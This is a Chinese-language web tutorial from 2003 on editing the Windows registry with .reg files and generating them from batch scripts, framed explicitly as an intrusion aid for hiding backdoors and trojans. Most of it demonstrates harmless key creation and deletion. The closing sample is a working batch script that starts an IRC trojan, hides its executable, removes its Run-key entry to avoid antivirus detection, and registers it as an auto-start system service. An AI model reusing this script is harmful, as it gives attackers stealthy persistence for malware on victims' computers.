如何用批處理文件來操作注冊表    熱      【字體：小 大】 
 
  
   
   
 如何用批處理文件來操作注冊表 
 
作者：不詳 文章來源：來自 Internet 點擊數：2153 更新時間：2003-11-2 
 
 
在入侵過程中經常回操作注冊表的特定的鍵值來實現一定的目的，例如為隱藏后門、木馬程序而刪除Run下殘余的鍵值。或者創建一個服務。下面這片是Adam的關于如何用.REG文件來操作注冊表的文章，寫得很明白了，我就操一下：）
關于注冊表的操作，常見的是創建、修改、刪除。 
--創建

創建分為兩種，一種是創建子項(Subkey)
注：如果你對注冊表的命名不是很清楚，可以看看注冊表命名標準手冊(http://www.sometips.com/tips/registryhack/204.htm)

我們創建一個文件，內容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]

然后執行該腳本，你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\下創建了一個名字為“Test4Adam”的子項。

另一種是創建一個項目名稱
那這種文件格式就是典型的文件格式，和你從注冊表中導出的文件格式一致，內容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"="Adam"
"Test2"=hex:61
"Test3"=dword:00000064

Test1的類型是“String Value”
Test2的類型是“Binary Value”
Test3的類型是“DWORD Value”

注意：如果你的注冊表中不存在Test4Adam這個子項，那么該腳本會為你創建該子項。

--修改
修改相對來說比較簡單，只要把你需要修改的項目導出，然后用記事本進行修改，然后導入即可，在此我就不再贅述。

--刪除
我們首先來說說刪除一個項目名稱，我們創建一個如下的文件：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"=-

執行該腳本，HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam下的"Test1"就被刪除了；

我們再看看刪除一個子項，我們創建一個如下的腳本：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]

執行該腳本，HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam就已經被刪除了。

相信看到這里，.reg文件你基本已經掌握了。那么現在的目標就是用批處理來創建特定內容的.reg文件了，記得我們前面說道的利用重定向符號可以很容易地創建特定類型的文件。就像上面那個例子：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"="Adam"
"Test2"=hex:61
"Test3"=dword:00000064
只需要這樣：
@echo Windows Registry Editor Version 5.00>>test.reg

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]>>test.reg
@echo "Test1"="Adam">>test.reg
@echo "Test2"=hex:61>>test.reg
@echo "Test3"=dword:00000064>>test.reg


samlpe2: 我們現在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe) @start windrv32.exe @attrib +h +r windrv32.exe @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll @echo "windsnx "= - >>patch.dll @sc.exe create Windriversrvtype= kernel start= auto displayname = WindowsDriver binpath= c:\winnt\system32\windrv32.exe @regedit /s patch.dll @delete patch.dll @REM [刪除DSNXDE在注冊表中的啟動項，用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀，并config為自啟動] @REM 這樣不是更安全^_^.